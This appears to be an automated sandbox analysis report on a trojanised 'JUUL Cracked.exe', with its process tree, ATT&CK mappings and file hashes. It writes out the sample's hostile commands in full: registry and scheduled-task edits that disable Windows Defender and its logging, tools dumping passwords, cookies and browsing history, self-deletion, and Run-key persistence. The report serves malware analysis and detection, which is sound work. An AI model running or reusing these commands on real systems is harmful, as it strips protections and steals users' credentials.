  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2596 /prefetch:2
  2⤵
  PID:5356

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2708

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2556

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:764

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004AC 0x00000000000004C8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1892

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3792

C:\Users\Admin\Desktop\JUUL Cracked.exe
"C:\Users\Admin\Desktop\JUUL Cracked.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1540
- \??\c:\users\admin\desktop\juul cracked.exe
  "c:\users\admin\desktop\juul cracked.exe "
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:2620
- - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" 3DdHBGXJtZaBFfP8HsYgGdL3DLw4WBuf00yKjIbZKNc1Nr+nzrpDTvVXtI3TWGd3D7jn2sOU8OpxPoMad06Tb7q50nITh7woWMNWueyHKx1jDcQsX+Yym/HpDncb/90wui6n05+UrtJRd0aSOYM9HgxvMxcKEMTy1sPflHNxbmI=
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:428
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:5220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:5276
      - C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
        
        C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
        6⤵
        Executes dropped EXE
        
        PID:5328
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:5720
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:5772
      - C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
        6⤵
        Executes dropped EXE
        
        PID:5820
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:5944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:5996
      - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
        6⤵
        Executes dropped EXE
        
        PID:6052
      - C:\Users\Admin\AppData\Local\Temp\splwow64.exe
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
        6⤵
        Executes dropped EXE
        
        PID:6068
      - C:\Users\Admin\AppData\Local\Temp\hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
        6⤵
        Executes dropped EXE
        
        PID:6084
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:4628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:3180
      - C:\Users\Admin\AppData\Local\Temp\xwizard.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
        6⤵
        Executes dropped EXE
        
        PID:2876
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
      4⤵
      PID:5248
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
    3⤵
    PID:3904
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:2508
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:3552
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:4508
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2344
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2628
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2372
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:4504
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:760
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:4744
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
      4⤵
      PID:2616
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:2588
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:5100
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:3760
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:4592
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:5008
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:4024
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3092
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "c:\users\admin\desktop\juul cracked.exe "
    3⤵
    PID:1288
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3612
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3540
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2432
  - - \??\c:\windows\resources\spoolsv.exe
      c:\windows\resources\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:3284
    - - \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:1400
      - \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5016

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3552

C:\Users\Admin\Desktop\JUUL Cracked.exe
"C:\Users\Admin\Desktop\JUUL Cracked.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5372
- \??\c:\users\admin\desktop\juul cracked.exe
  "c:\users\admin\desktop\juul cracked.exe "
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:5420
- - C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
    "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" 3DdHBGXJtZaBFfP8HsYgGdL3DLw4WBuf00yKjIbZKNc1Nr+nzrpDTvVXtI3TWGd3D7jn2sOU8OpxPoMad06Tb7q50nITh7woWMNWueyHKx1jDcQsX+Yym/HpDncb/90wui6n05+UrtJRd0aSOYM9HgxvMxcKEMTy1sPflHNxbmI=
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:5568
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:5468
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:5628
      - C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
        
        C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
        6⤵
        Executes dropped EXE
        
        PID:5784
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:6104
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:6132
      - C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
        6⤵
        Executes dropped EXE
        
        PID:6128
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:2184
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:5192
      - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
        
        C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
        6⤵
        Executes dropped EXE
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\splwow64.exe
        
        C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
        6⤵
        Executes dropped EXE
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\hh.exe
        
        C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
        6⤵
        Executes dropped EXE
        
        PID:5012
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
      4⤵
      PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c compile.bat
        5⤵
        
        PID:2944
      - C:\Users\Admin\AppData\Local\Temp\xwizard.exe
        
        C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
        6⤵
        Executes dropped EXE
        
        PID:5172
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
      4⤵
      PID:6036
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
    3⤵
    PID:5580
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:572
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:5628
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:5640
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:5660
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5676
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5716
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5740
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5776
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:5792
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:5800
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
      4⤵
      PID:5732
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:5872
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:5824
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:6008
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:6096
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:5960
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:6092
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:5984
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:1052
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:6112
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:5004
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3484
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3792
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:4744
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3884
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2532
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:4424
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "c:\users\admin\desktop\juul cracked.exe "
    3⤵
    PID:2824
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:5216
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5500
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5540

C:\Users\Admin\Desktop\JUUL Cracked.exe
"C:\Users\Admin\Desktop\JUUL Cracked.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4820
- \??\c:\users\admin\desktop\juul cracked.exe
  "c:\users\admin\desktop\juul cracked.exe "
  2⤵
  - Executes dropped EXE
  PID:5212
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5528
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\juul cracked.exe .log

Filesize
1KB

MD5
2d731a4f641710a4357a4b323a3f86a9

SHA1
d909f60a0cb2629dc37b76307fc2ee1f43067606

SHA256
799c5f4b4d561d2f78ed7325303d868837a3bd4bbb47303e7fcebc3a43f43d76

SHA512
1b324f8ff405ea73893303a821c8308be092e00863f9d1872c19ee7e7abfda6a82785c30d5e0304789a625e93ce50ab85a94af8ca2b9f585a2029e192c3ed0ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6e15af8f29dec1e606c7774ef749eaf2

SHA1
15fbec608e4aa6ddd0e7fd8ea64c2e8197345e97

SHA256
de9124e3fddde204df6a6df22b8b87a51823ba227d3e304a6a6aced9da00c74c

SHA512
1c9c9acd158273749e666271a5cdb2a6aebf6e2b43b835ebcc49d5b48490cbbf4deddef08c232417cee33d4809dec9ddac2478765c1f3d7ed8ea7441f5fd1d15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3e5a2dac1f49835cf442fde4b7f74b88

SHA1
7b2cf4e2820f304adf533d43e6d75b3008941f72

SHA256
30bd1e1bafb4502c91c1fb568372c0fb046d32a4b732e6b88ce59ea23663e4ce

SHA512
933ac835894ce6cb8aac0261153823c96b6abec955173653dd56e534d644efd03aec71acb4f8cb0b9af871962296ec06cd03e570a0ac53098b8cd55657543786

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
47KB

MD5
24edf43fe24e0e2e7352dbf325da6d4f

SHA1
26b8244d8366e748da623305c3640f7067c3c22a

SHA256
26d41b24cbbeb3c94bcbb52078ba4604564b15244e1f7a519d835a46101a7db9

SHA512
9660c8e0aac4c9061c535ffc8058d999b614e891b00bb60de16ba80a4910c79525538875174c7a6cdf430676fdb403ae63be39d2cba81518bb82e48cccf4af64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
22KB

MD5
7a204d478c8dfe822bf86f9103bbd9b3

SHA1
7114b36ea1588d9372d730b2ee5dec7a3aee36d1

SHA256
d9134e3cf60db564c49cc181251c7308bc568acf060444c443a90c0f464ebfeb

SHA512
f5fb06a9808e9370a5fb3b926ffa27746ca7942eba36a2f63135168218e326abc74195453b9bcd8a045d5870a71b7f250dfc281515c7fa51857410acb316763e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
789KB

MD5
db0cfcb08efd9a0a0e89488d1fd18353

SHA1
41631cd823755ed2c40e063da274df9514ca1141

SHA256
e4829eac0d23f9a3d18504b81bf9af94b1faf815767ffa5ab0e7e0f38c1ff8f3

SHA512
54d9940ce434717483d326dfbf2827d218cfdc49f025e554e2850d40ba9d05b95f69928bd8fbd65cc49e4492ab64d9395f4944d7bef5db77a5ce69112a4dbc88

Download Submit
